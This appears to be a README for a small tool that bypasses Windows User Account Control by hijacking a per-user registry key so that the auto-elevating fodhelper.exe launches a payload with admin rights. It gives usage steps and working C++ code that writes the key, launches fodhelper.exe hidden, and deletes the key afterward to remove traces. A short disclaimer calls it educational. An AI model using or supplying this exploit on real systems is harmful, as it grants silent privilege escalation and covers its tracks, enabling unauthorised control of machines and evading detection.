autoelevate-exploit

A minimalistic UAC bypass exploit leveraging Windows' built-in fodhelper.exe auto-elevation.
This uses a registry hijack under HKCU\Software\Classes\ms-settings\Shell\Open\command to run a custom payload with elevated privileges without triggering UAC prompts.

---

How It Works

• fodhelper.exe is a trusted Microsoft binary with the autoElevate flag, meaning Windows runs it elevated silently.
• By modifying a specific registry key in the current user's hive, we hijack the command it runs on launch.
• Launching fodhelper.exe triggers the elevated execution of the payload defined in the registry.
• After execution, the registry key is cleaned up to avoid traces.

---

Usage

1. Compile the C++ code.
2. Run the executable as a standard user.
3. The payload (default is cmd.exe) will launch with admin privileges silently.
4. The registry key will be deleted automatically post-execution.

---

Disclaimer

This project is for educational purposes only.
Misuse can cause serious harm and is illegal. Use responsibly and only in controlled environments you own or have explicit permission to test.

---

Stay sharp, use power wisely.

---

Example

RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", &hKey);
RegSetValueExA(hKey, "", 0, REG_SZ, (BYTE*)"C:\\Windows\\System32\\cmd.exe", strlen("C:\\Windows\\System32\\cmd.exe") + 1);
RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (BYTE*)"", 1);
RegCloseKey(hKey);
ShellExecuteA(NULL, "open", "C:\\Windows\\System32\\fodhelper.exe", NULL, NULL, SW_HIDE);
Sleep(2000);
RegDeleteTreeA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command");